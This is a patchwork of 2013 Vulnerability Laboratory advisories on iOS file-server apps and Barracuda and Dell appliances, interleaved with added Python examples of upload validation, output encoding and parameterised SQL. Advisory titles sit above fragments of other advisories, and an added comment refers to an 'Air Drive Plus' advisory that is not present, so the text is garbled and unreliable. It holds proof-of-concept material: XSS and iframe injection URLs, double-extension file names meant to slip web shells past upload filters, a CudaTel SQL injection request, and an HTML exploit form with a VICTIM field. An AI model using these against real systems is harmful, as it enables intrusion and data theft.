Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
Dell Kace 1000 SMA v5.4.70402 - Persistent Vulnerabilities
are estimated as medium(+).

Credits:
Vulnerability Laboratory [Research Team] - Ibrahim Mosaad El-Sayed [ibra...@evolution-sec.com]
Olive File Manager v1.0.1 iOS - Multiple Vulnerabilities
in the index file dir listing module of the web server (http://localhost:8797/) when it displays manipulated folder names injected via a POST request. The persistent script code is executed in the main index file dir listing module when the service lists the newly created malicious folder name as an item. Exploitation of the persistent web vulnerability requires low or medium user interaction and no application user account. Successful exploitation can lead to persistent session hijacking (customers), account theft via persistent web attacks, persistent phishing, or stable (persistent) manipulation of certificate mail notification context.

Vulnerable Application(s):
[+] Olive File Manager v1.0.1 - iTunes or AppStore (Apple)

Vulnerable Module(s):
[+] Add Folder

Vulnerable Parameter(s):
[+] foldername

Affected Module(s):
[+] Index Folder Listing (http://localhost:8797/)

Proof of Concept:
1.1 The file include and arbitrary file upload vulnerability can be exploited by remote attackers without a privileged application user account and without user interaction. For demonstration or reproduction ...
PoC: Filename

<div class=file_list_container>
<div class=file_list_item><table height=50px border=0 cellpadding=0 cellspacing=0 width=100%><tbody><tr><td align=center valign=middle width=50></td><td align=left valign=middle width=*><a href=></a></td></tr></tbody></table></div>
<div class=file_list_item><table height=50px border=0 cellpadding=0 cellspacing=0 width=100%><tbody><tr><td align=center valign=middle width=50></td><td align=left valign=middle width=*><a href=[LOCAL FILE/PATH REQUEST!]></a> (Size:27,27 Kb, Last Modified:2013-07-12 18:34:15)<br /></td></tr></tbody></table></div>
<div class=file_list_item><table width=100% height=50px border=0 cellpadding=0 cellspacing=0><tbody><tr><td width=50 align=center valign=middle></td><td width=* align=left valign=middle><a href=[LOCAL FILE/PATH REQUEST!]></a> (Size:27,27 Kb, Last Modified:2013-07-12 18:33:42)<br /></td></tr></tbody></table></div>
</div></div>
<div class=footer><div class=footer_text>Copyright © 2008 OliveOffice,Inc.</div></div></body></html></iframe></a></td></tr></tbody></table></div></div>

--- POST Method Request Log ---
POST_DATA[-151253266715950
Content-Disposition: form-data; name=file; filename=[LOCAL FILE/PATH REQUEST!].png
Content-Type: image/png

1.2 The persistent input validation web vulnerability can be exploited by remote attackers without a privileged application user account and with low or medium required user interaction. For demonstration or reproduction ...

PoC: Foldername

<div class=file_list_container>
<div class=file_list_item><table height=50px border=0 cellpadding=0 cellspacing=0 width=100%><tbody><tr><td align=center valign=middle width=50></td><td align=left valign=middle width=*><a href=></a></td></tr></tbody></table></div>
<div class=file_list_item><table height=50px border=0 cellpadding=0 cellspacing=0 width=100%><tbody><tr><td align=center valign=middle width=50></td><td align=left valign=middle width=*><a href=%20[PERSISTENT INJECTED SCRIPT CODE!] [PERSISTENT INJECTED SCRIPT CODE!]/%20 [PERSISTENT INJECTED SCRIPT CODE!]/></a> (Size:0 Kb, Last Modified:2013-07-12 18:26:31)<br /></td></tr></tbody></table></div>
</div></div>
<div class=footer><div class=footer_text>Copyright © 2008 OliveOffice,Inc.</div></div></body></html></iframe></a></td></tr></tbody></table></div></div>

Risk:
1.1 The security risk of the arbitrary file upload web vulnerability and the upload filter bypass issue is estimated as high(+).
1.2 The security risk of the persistent input validation vulnerability is estimated as high(-).
Overall, the security risk of the persistent input validation web vulnerability is estimated as high(-).

Credits:
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com)
WiFly 1.0 Pro iOS - Multiple Web Vulnerabilities
Solution:
The vulnerability can be patched by restricting the JSON upload request and the URL parameter. The POST request used for uploading needs to be restricted, encoded and filtered.

Risk:
The security risk of the local file/path include and arbitrary file upload vulnerability is estimated as high.

Credits:
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com)
Flux Player v3.1.0 iOS - File Include Arbitrary File Upload Vulnerability
,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Headers:
Accept-Ranges[bytes]
Content-Length[669]
Date[Mo., 15 Jul 2013 20:05:02 GMT]

1.2
--- Request Session Log 2 - Arbitrary File Upload ---
Status: 200[OK]
POST http://localhost:8080/
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[1053] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://localhost:8080/]
Connection[keep-alive]
Post Data:
POST_DATA[-21961286324572
Content-Disposition: form-data; name=file; filename=schoko-drops-337.gif.html.php.js.jpg
Content-Type: image/png
---
Status: 200[OK]
GET http://localhost:8080/schoko-drops-337.gif.html.php.js.jpg [Included File/Path as Filename!]
Load Flags[LOAD_DOCUMENT_URI ] Content Size[669] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Headers:
Accept-Ranges[bytes]
Content-Length[669]
Date[Mo., 15 Jul 2013 20:05:05 GMT]

Note: After uploading the manipulated malicious file (a shell or web shell), the remote attacker can reach the full file by dropping the image file extension from the request. It is also possible to upload a file with multiple file extensions and access it through another frame.
PoC:
<html><head><title>Files from /</title><style>html {background-color:#ee} body { background-color:#FF; font-family:Tahoma,Arial,Helvetica,sans-serif; font-size:18x; margin-left:15%; margin-right:15%; border:3px groove #006600; padding:15px; } </style></head>
<body><h1>Files from /</h1><bq>The following files are hosted live from the <strong>iPhone's</strong> Docs folder.</bq><p><a href=></a><br>
<a href=.DownloadStatus>.DownloadStatus</a> ( 0.0 Kb, (null))<br>
<a href=.mpdrm>.mpdrm</a> ( 0.0 Kb, (null))<br>
<a href=<iframe src=a_[File Include/Arbitrary File Upload Vulnerability!]></a>(0.0 Kb, (null))<br />
<a href=BKM337></a> ( 0.0 Kb, (null))<br />
<a href=Rem0ve>Rem0ve</a> ( 0.0 Kb, (null))<br />
<a href=a2b642e7de.jpg>a2b642e7de.jpg</a> ( 0.0 Kb, (null))<br />
</p><form action= method=post enctype=multipart/form-data name=form1 id=form1><label>upload file <input type=file name=file id=file /></label><label><input type=submit name=button id=button value=Submit /></label></form></body></html></iframe></a></p></body></html>

Note: To exploit the issue the attacker needs to bypass the validation by injecting two different scripts (tags). After the upload, the local file or path is executed when the item listing is opened.

Solution:
1.1 The vulnerability can be patched by securely parsing file names when processing the upload via POST request. Encode and parse the file name output in the listing on the application's index page. Restrict the file name input and disallow special characters.
1.2 Restrict file names with multiple extensions when processing an upload. Encode and parse the file name output in the listing on the application's index page. Restrict the file name input and disallow special characters. Disallow opening URLs with multiple file extensions to prevent execution of, or access to, web shells.

Risk:
1.1 The security risk of the local file include web vulnerability is estimated as high.
1.2 The security risk of the arbitrary file upload vulnerability is estimated as high(+).
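The three upload advisories above (Air Drive Plus, Olive File Manager and Flux Player) share the same weaknesses: the multipart `filename` is trusted as a path, and only the first or last extension is looked at, so `1337.png.gif.php.js.html` or `schoko-drops-337.gif.html.php.js.jpg` passes as an image. Below is an added example of the server-side handling the Solution sections call for; it is not code from any of those apps, and the allowlist, the upload root and the random-name scheme are assumptions.

```python
# Added example: hardened handling of the multipart `filename` field.
# Not code from Air Drive Plus, Olive File Manager or Flux Player; the
# allowlist, the upload root and the listing shape are assumptions.
import ntpath
import os
import re
import secrets

ALLOWED_EXT = {"png", "gif", "jpg", "jpeg", "pdf", "txt"}      # assumed policy
# Extensions a web server or browser may execute or render as code.
EXECUTABLE_EXT = {"php", "phtml", "php3", "php5", "js", "html", "htm", "svg", "xhtml", "sh"}
STEM_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


class UploadRejected(ValueError):
    """Raised when the client-supplied file name fails validation."""


def validate_upload_name(client_name: str) -> str:
    """Validate the client-supplied name and return the extension to store
    under. Every extension in the chain is inspected, so
    `1337.png.gif.php.js.html` and `x.gif.html.php.js.jpg` are rejected even
    though the first or last extension looks like an image."""
    if any(ord(ch) < 32 for ch in client_name):
        raise UploadRejected("control character in file name")
    # Drop any directory part, whichever separator the client used
    # (e.g. ';/private/var/mobile/Applications/1337.png' -> '1337.png').
    base = ntpath.basename(client_name)
    parts = base.split(".")
    if len(parts) < 2 or not parts[0]:
        raise UploadRejected("missing name or extension")
    stem, exts = parts[0], [p.lower() for p in parts[1:]]
    if any(e in EXECUTABLE_EXT for e in exts):
        raise UploadRejected("executable extension in chain: " + base)
    if len(exts) != 1:
        raise UploadRejected("multiple extensions: " + base)
    if exts[0] not in ALLOWED_EXT:
        raise UploadRejected("extension not allowed: " + exts[0])
    if not STEM_RE.fullmatch(stem):
        raise UploadRejected("disallowed characters in name: " + stem)
    return exts[0]


def accepted(client_name: str) -> bool:
    """Convenience predicate for the checks above."""
    try:
        validate_upload_name(client_name)
        return True
    except UploadRejected:
        return False


def storage_path(upload_root: str, client_name: str) -> str:
    """Choose the on-disk location: a server-generated random name inside
    `upload_root`, never the client's name. The containment check is
    defence in depth should the naming logic ever change."""
    ext = validate_upload_name(client_name)
    root = os.path.abspath(upload_root)
    path = os.path.abspath(os.path.join(root, f"{secrets.token_hex(16)}.{ext}"))
    if os.path.commonpath([root, path]) != root:
        raise UploadRejected("path escapes upload root")
    return path


if __name__ == "__main__":
    # Constructed inputs, including the file names from the advisories above.
    for name in ("holiday.jpg", ";/private/var/mobile/Applications/1337.png",
                 "1337.png.gif.php.js.html", "schoko-drops-337.gif.html.php.js.jpg",
                 "shell.PHP", "a b.png", "x.png\x00.php"):
        print(f"{name!r:50} accepted={accepted(name)}")
    print(storage_path("/srv/uploads", "holiday.jpg"))
```

Storing under a random server-chosen name also removes the "delete the image extension and fetch the shell" trick from the Flux Player note: the client never learns or controls the path the bytes live at, and a directory that is never served with script execution enabled closes the remaining gap.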
Credits:
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com)
Barracuda CudaTel 2.6.02.04 - Multiple Client Side Cross Site Vulnerabilities (Bug Bounty #17)
bbx_outbound_route_name: [CLIENT-SIDE SCRIPT CODE!]
bbx_outbound_route_regex: ^\\d{10}$
bbx_outbound_route_type: national
</pre></body></html></iframe></pre>

PoC:
http://cudatel.127.0.0.1:1338/gui/route/route?%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C
http://cudatel.127.0.0.1:1338/gui/route/route?_=1354073910062&bbx_outbound_route_flag_locked=%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C

1.2
Review: AJAX - HTML queues_wall_stub - Monitor Queue Link (ops opOpenQueueWallboard)

<h3>Queue Monitor <a class="ops opOpenQueueWallboard" href="#">Large View in New Window</a></h3>

PoC:
http://cudatel.127.0.0.1:1338/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C#

1.3
Review: Eventlog eventlog - Web login attempt fail (Exception Handling) - Listing (bbx_eventlog_message)

- bbx_eventlog_date_time: 2012-11-26 15:25:59
  bbx_eventlog_email_sent: 0
  bbx_eventlog_fullname: Admin
  bbx_eventlog_id: 2823
  bbx_eventlog_ip_addr: 178.200.236.201
  bbx_eventlog_message: Web login attempt fail for [x]%20%20split%20%20[CLIENT-SIDE SCRIPT CODE!]) from 178.200.236.201
  bbx_eventlog_priority: notice
  bbx_eventlog_user_agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0
  bbx_user_id: 1
-

PoC:
http://cudatel.127.0.0.1:1338/gui/eventlog/eventlog?%3Cx%3E%20%20%20%20%22%3E%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C

Reference(s):
http://cudatel.ptest.cudasvc.com/gui/route/route
http://cudatel.ptest.cudasvc.com/ajax-html/queues_wall_stub.html
http://cudatel.ptest.cudasvc.com/gui/eventlog/eventlog

Risk:
=
The security risk of the (multiple) client-side input validation vulnerabilities is estimated as medium.

Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
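The three reflected parameters above (the route name, the query string of the queue wallboard stub, and the failed-login user name in the event log) share one root cause: request data is written into the page unencoded. The following is an added example in Python, not CudaTel code, that shows the vulnerable concatenation beside the two fixes the advisory asks for, output encoding and input restriction. The function names, the event-log row template and the sample login name are constructed for this illustration.

```python
import html
import re
from urllib.parse import unquote_plus, urlencode

# Constructed sample input shaped like the advisory's eventlog PoC: the
# "username" of a failed web login is attacker-chosen and later displayed.
RAW_QUERY_USER = "%3Cx%3E%20%20%20%20%22%3E%3Csvg%20onload%3Dalert(1)%3E%20%3C"
LOGIN_USER = unquote_plus(RAW_QUERY_USER)   # '<x>    "><svg onload=alert(1)> <'


def vulnerable_eventlog_row(user: str, ip: str) -> str:
    """The pattern the advisory describes: the rejected login name is
    concatenated verbatim into the listing markup (hypothetical template)."""
    return f"<td>Web login attempt fail for {user} from {ip}</td>"


def safe_eventlog_row(user: str, ip: str) -> str:
    """Same row, with every untrusted value entity-encoded for HTML body
    context. quote=True also encodes " and ', so the same call is safe
    inside a quoted attribute."""
    return (f"<td>Web login attempt fail for {html.escape(user, quote=True)}"
            f" from {html.escape(ip, quote=True)}</td>")


def safe_link(base: str, params: dict) -> str:
    """Rebuild a link such as /gui/route/route?... from untrusted values.
    urlencode percent-encodes <, >, ", spaces and &, so a value cannot
    terminate the href attribute or smuggle extra parameters."""
    return base + "?" + urlencode(params)


def parse_locked_flag(value: str) -> bool:
    """Input restriction for bbx_outbound_route_flag_locked: accept only the
    two values the field can legitimately hold and reject everything else."""
    if value not in ("0", "1"):
        raise ValueError(f"invalid flag value: {value!r}")
    return value == "1"


def has_raw_markup(rendered: str, allowed_tags=("td",)) -> bool:
    """Crude check usable in a test: any tag other than the template's own
    means untrusted data reached the page unencoded."""
    tags = {m.lower() for m in re.findall(r"</?([a-zA-Z][a-zA-Z0-9]*)", rendered)}
    return bool(tags - set(allowed_tags))
```

The encoding must happen at the point of output, in the context where the value lands (HTML text, attribute, or URL); validating the flag on input is an additional layer for fields whose value space is known, not a replacement for encoding.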
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
Download Lite v4.3 iOS - Persistent File Web Vulnerability
is processing to open the index listing.

Solution:
=
The vulnerability can be patched by securely encoding and parsing the file name in the main file directory listing (index) module of the application.

Risk:
=
The security risk of the persistent input validation web vulnerability is estimated as medium(+).

Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com)
Barracuda LB, SVF, WAF WEF - Multiple Vulnerabilities
ExtpZnJhbWUgc3JjYSBvbmxvYWRhbGVydFZMICAxJTAjBgNVBAoTHGlmcmFtZSBz
cmNhIG9ubG9hZGFsZXJ0VkwgIDMxJTAjBgNVBAsTHGlmcmFtZSBzcmNhIG9ubG9h
ZGFsZXJ0VkwgIDQxJDAiBgNVBAMTG2lmcmFtZXNyY2FvbmxvYWRhbGVydHZsZ29h
bDEqMCgGCSqGSIb3DQEJARYbYWRtaW5AdnVsbmVyYWJpbGl0eS1sYWIuY29tggEA
MAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEBABiGKfDora8sj8YWgnFb
WNyvnkaah5Ds21nFaN5I3ReSPLDGEAdRYSI3K9g9LjHLIkyUT2kDChLXPnm6Gbuu
BVGUKQpZV+ORbB5J1NvmFJlyCVU+3PmU5JFggmsuBRSI1sIsUvyVdRxeasnhlw7i
ZwtWAz1D13+zfb60QZc+Ekvn2d2RKFQ5eWxGrlEZ3niRjcO9Jr/HVE66HTzf6AUn
r1zcu/7IqNr9wI0I9cQx2lnR9GgpSP3gBH7F5SXw6b1dLvHVIgcnd62JzyJNrQ1B
dQYTStsbK710ik9OKq86j8tgQ9Q0TdLh7t9KncRmlZtxZSeYkzM9j1vdDpSrMMHU
3xU=
-----END CERTIFICATE-----

Solution:
=
The vulnerabilities can be patched by encoding the affected certificate values before they are displayed in the output listing. Restrict and validate the input fields of trusted and self-signed certificates so that script code cannot execute outside the certificate context.

Risk:
=
The security risk of the persistent input validation web vulnerabilities is estimated as high(-).

Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com)
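The subject fields of a trusted or self-signed certificate are free-form strings chosen by whoever generated the certificate, which is why an appliance that echoes them into its certificate listing is exposed. The following added example, not Barracuda's code, builds a DER-encoded X.501 Name whose CN carries the same kind of payload as the certificate above, decodes it the way a certificate viewer would, and renders it once unsafely and once with HTML entity encoding. The Name encoder, the decoder, the OID table and the sample values are constructed for the illustration; in a real certificate the subject sits inside the tbsCertificate structure rather than stand-alone.

```python
import html

# Attribute type OIDs (id-at-commonName, organizationName, organizationalUnitName)
OIDS = {
    bytes.fromhex("550403"): "CN",
    bytes.fromhex("55040a"): "O",
    bytes.fromhex("55040b"): "OU",
}
# UTF8String, PrintableString, IA5String: the value types a viewer has to display
STRING_TAGS = {0x0c: "utf-8", 0x13: "ascii", 0x16: "ascii"}


def _der_len(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _der_len(len(body)) + body


def encode_name(attrs) -> bytes:
    """Encode [(short_name, value), ...] as an X.501 Name: SEQUENCE OF SET OF
    AttributeTypeAndValue, values as UTF8String. Only used to build the
    constructed sample; openssl req would emit the same structure."""
    by_name = {v: k for k, v in OIDS.items()}
    rdns = b"".join(
        _tlv(0x31, _tlv(0x30, _tlv(0x06, by_name[n]) + _tlv(0x0c, v.encode("utf-8"))))
        for n, v in attrs)
    return _tlv(0x30, rdns)


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, position after the element); handles long-form lengths."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:
        n = length & 0x7f
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    end = pos + length
    if end > len(buf):
        raise ValueError("truncated DER")
    return tag, buf[pos:end], end


def decode_name(der: bytes):
    """Walk the Name and return [(type, value), ...]. The values come back as
    plain text exactly as the certificate holder chose them."""
    tag, body, _ = _read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("Name must be a SEQUENCE")
    out, pos = [], 0
    while pos < len(body):
        tag, rdn, pos = _read_tlv(body, pos)
        if tag != 0x31:
            raise ValueError("RDN must be a SET")
        inner = 0
        while inner < len(rdn):
            tag, atv, inner = _read_tlv(rdn, inner)
            if tag != 0x30:
                raise ValueError("AttributeTypeAndValue must be a SEQUENCE")
            _, oid, p = _read_tlv(atv, 0)
            vtag, val, _ = _read_tlv(atv, p)
            if vtag not in STRING_TAGS:
                raise ValueError(f"unsupported value type 0x{vtag:02x}")
            out.append((OIDS.get(oid, oid.hex()), val.decode(STRING_TAGS[vtag])))
    return out


def render_subject_unsafe(attrs) -> str:
    """What the advisory describes: subject values pasted into the listing as-is."""
    return "<br>".join(f"{t}={v}" for t, v in attrs)


def render_subject(attrs) -> str:
    """Fixed listing: every decoded value is entity-encoded for HTML context."""
    return "<br>".join(f"{html.escape(t)}={html.escape(v, quote=True)}" for t, v in attrs)


# Constructed sample subject with a script payload in the CN, as in the PoC certificate.
SAMPLE_SUBJECT = encode_name([
    ("CN", '<iframe src=a onload=alert("VL")>'),
    ("O", "Vulnerability-Lab test"),
])
```

The parser deliberately refuses value types it does not know how to display rather than guessing an encoding; a viewer that silently decodes unknown types is another place where bytes of the attacker's choosing reach the page.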
Barracuda CudaTel 2.6.02.040 - Remote SQL Injection Vulnerability
interaction. For demonstration or reproduce ...

Standard Request: Row 100
http://cudatel.127.0.0.1:1336/gui/cdr/cdr?_=1353973149509&since=1+day&search_string=&rows=100&page=1&sortby=end_timestamp&sortorder=desc

Standard Request: Output
---
1. {count:0,page:1,cdr:[],rows:100}

Manipulated Request:
http://cudatel.127.0.0.1:1337/gui/cdr/cdr?_=1353973149509&since=1+day&search_string=&rows=100&page='1+1%27[SQL-Injection!]%27--&sortby=end_timestamp&sortorder=desc
... or
http://cudatel.127.0.0.1:1337/gui/cdr/cdr?%20%20_=1353973149509&since=1+day&search_string=&page='1335&page='1336&page='1337&rows='1+1%27[SQL-Injection!]%27--&page=1&sortby=end_timestamp&sortorder=desc

Manipulated Output:
---
1. cdr: []
   count: 0
   page: 1
   rows: 1+2
---
1. cdr: []
   count: 1+2'
   page:
     - '1335
     - '1336
     - '1337
     - '1
   rows: -1+1'[SQL-Injection!]'--

Exploit (PoC):
<html><head><body><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9">
<title>Barracuda Networks CudaTel [CDR] (ROW&PAGE) - Remote SQL-Injection [PROOF OF CONCEPT]</title>
<script language="JavaScript">
var path="/gui/cdr/cdr";
var adres="?%20%20_=1353973149509&since=1+day&search_string=&page='1335&page='1336&page='1337&rows=";
var domain="http://cudatel.127.0.0.1:1337";
var sql="'1+1%27[SQL-Injection!]%27--";
function command(){
  if (document.rfi.target1.value==""){
    alert("NOPE!");
    return false;
  }
  rfi.action= document.rfi.target1.value+path+adres+domain+sql;
  rfi.submit();
}
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Barracuda Networks CudaTel [CDR] (ROW&PAGE) - Remote SQL-Injection Exploit
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Vulnerability Research Laboratory (www.vulnerability-lab.com)
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Greets: Ibrahim EL-Sayed, Chokri Ben Achour, Mohammed ABKD. Stealthwalker
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
</script></head><body bgcolor="#00" link="#99">
<center><p align="center"><b><font face="Verdana" size="2" color="#006633">Barracuda Networks CudaTel [CDR] (ROW&PAGE) - Remote SQL-Injection Exploit</font></b></p>
<form method="post" target="getting" name="rfi" onSubmit="command();"><div align="left">
<p><b><font face="Arial" size="2" color="#006633">VICTIM:</font></b> <input type="text" name="target1" size="53" style="background-color: #006633" onMouseOver="javascript:this.style.background='#808080';" onMouseOut="javascript:this.style.background='#808000';"></p>
<p><b><font face="Arial" size="2" color="#006633">EXAMPLE:</font><font face="Arial" size="2" color="#808080"> HTTP://VULNERABILITY-LAB.COM/[SCRIPT-PATH]/</font></b></p></div>
<p align="left"><input type="submit" value="Execute INPUT" name="B1"></p><p align="left"><input type="reset" value="Clear ALL" name="B2"></p></form>
<p><br><iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe></p>
<div align="left"><p align="center"><b><font face="Verdana" size="2" color="#008000">VULNERABILITY-LAB <a href="mailto:resea...@vulnerability-lab.com">BKM</a></font></b></p></div></center></body></html>

1.2
The client-side input validation vulnerability can be exploited by remote attackers without an application user account and with medium user interaction. For demonstration or reproduce ...

PoC:
http://cudatel.127.0.0.1:1336/gui/cdr/cdr?_=1353973149509&since=1+day&search_string=&rows=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]&page=1&sortby=end_timestamp&sortorder=desc
http://cudatel.127.0.0.1:1336/gui/cdr/cdr?_=1353973149509&since=1+day&search_string=&rows=100&page=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]&sortby=end_timestamp&sortorder=desc

Note: We only verified the bug with the same exception in an unparsed parameter, but the bug itself is located in all areas that share the invalid exception handling.

Solution:
=
1.1 To patch the SQL injection, parse and validate the rows and page parameters in the cdr module.
1.2 To fix the client-side XSS vulnerability, encode the rows parameter and restrict its input. Encode the affected exception-handling output when invalid input values are displayed.

Note: Barracuda Networks provided an update from version 2.6.002.040 to v2.6.003.x to all clients and customers in the BN customer area.

Risk:
=
1.1 The security risk of the remote SQL injection web vulnerability is estimated as critical.
1.2 The security risk of the client-side input validation web vulnerability is estimated as medium(-).

Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com)
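What the manipulated output shows (rows: 1+2 returned for an input of 1+1) is the database evaluating attacker-supplied text in the LIMIT/OFFSET position. The added example below, Python with an in-memory sqlite3 table standing in for the CDR store (table and column names are assumptions, not CudaTel's schema, and the code is not Barracuda's), reproduces that behaviour, shows that a subquery in the same position is evaluated too, and then applies the fix from the solution section: validate rows and page as bounded integers and bind them as query parameters.

```python
import re
import sqlite3

_INT_RE = re.compile(r"[1-9][0-9]{0,9}")   # plain positive decimal only


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the CDR table with ten call records."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cdr (id INTEGER PRIMARY KEY, caller TEXT, end_timestamp INTEGER)")
    conn.executemany("INSERT INTO cdr (caller, end_timestamp) VALUES (?, ?)",
                     [(f"100{i}", 1353973149 + i) for i in range(10)])
    conn.commit()
    return conn


def vulnerable_cdr(conn, rows: str, page: str):
    """The pattern the advisory describes: rows and page go straight into
    the SQL text, so whatever the client sends is evaluated by the database
    (arithmetic, quotes, comments, subqueries)."""
    sql = ("SELECT id, caller FROM cdr ORDER BY end_timestamp DESC "
           f"LIMIT {rows} OFFSET ({page}-1)*{rows}")
    return conn.execute(sql).fetchall()


def _positive_int(name: str, value: str, maximum: int) -> int:
    """Accept only a plain positive decimal within a server-chosen bound."""
    if not _INT_RE.fullmatch(value):     # rejects 1+1, 1'--, subqueries, empty
        raise ValueError(f"{name} must be a positive integer, got {value!r}")
    n = int(value)
    if n > maximum:
        raise ValueError(f"{name} exceeds {maximum}: {n}")
    return n


def safe_cdr(conn, rows: str, page: str):
    """Validate both values as bounded integers and bind them as parameters;
    the SQL text is constant whatever the client sends."""
    r = _positive_int("rows", rows, 1000)
    p = _positive_int("page", page, 100000)
    return conn.execute(
        "SELECT id, caller FROM cdr ORDER BY end_timestamp DESC LIMIT ? OFFSET ?",
        (r, (p - 1) * r),
    ).fetchall()
```

The bound on rows matters on its own: even with binding, an unbounded LIMIT lets a client pull the whole call-detail history in one request.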
Dell Kace 1000 SMA 5.4.742 - SQL Injection Vulnerabilities
Photo Server 2.0 iOS - Multiple Critical Vulnerabilities
exploitation of the vulnerability results in unauthorized file access because the device is compromised after the upload of web shells.

Vulnerable Module(s):
[+] Upload (Files)

Vulnerable Parameter(s):
[+] filename (multiple extensions)

Affected Module(s):
[+] Index File Dir Listing

Proof of Concept:
=
1.1 The local command/path inject web vulnerability can be exploited by local attackers with device access and without user interaction. For demonstration or reproduce ...

PoC:
<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>iPad ¥337 360* [COMMAND/PATH INJECT VULNERABILITY] Photo Server app's Web Browser Interface Page</title></head><body>
<center><h2>iPad ¥337 360* [COMMAND/PATH INJECT VULNERABILITY]'s Photo Server App Web Browser Interface Page</h2></center>
<form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>Choose QuickTime (.MOV) or JPEG (.JPG or .jpeg) file to upload to iPad ¥337 360* <iframe src=a: <input type="file" name="file" id="file" value="Choose file..." /></label><label><input type="submit" name="button" id="button" value="Upload" /></label></form><hr><p><i>Save videos or photos of the links below to hard drive by using context menu's (mouse right-click) "Save Link As ..." function.</i><hr><h1>The Video and Photo List</h1>
<li><a href='assets-library---asset/asset.PNG?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22&ext=PNG'><img

--- Request Session Log ---
Status: 200[OK]
GET http://192.168.2.104:/vulnerabilitylab
Load Flags[LOAD_DOCUMENT_URI ] Content Size[3032] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.104:]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer [http://192.168.2.104:/]
Connection[keep-alive]
Response Headers:
Accept-Ranges[bytes]
Content-Length[3032]
Date[So., 21 Jul 2013 10:13:51 GMT]

1.2 The file include web vulnerability can be exploited by remote attackers without an application user account and without user interaction. For demonstration or reproduce ...

PoC:
<hr><h1>The Video and Photo List</h1>
<li><a href="http://192.168.2.104:/assets-library---asset/../[File Include Vulnerability].PNG?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22&ext=PNG"><img src="iPad%20%C3%82%C2%A5337%20360%20%20Photo%20Server%20app%27s%20Web%20Browser%20Interface%20Page_files/../[File Include Vulnerability].PNG">assets-library---asset/../[File Include Vulnerability].PNG?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22.PNG</a>

1.3 The arbitrary file upload vulnerability can be exploited by remote attackers without an application user account and without user interaction. For demonstration or reproduce ...

PoC:
<hr><h1>The Video and Photo List</h1>
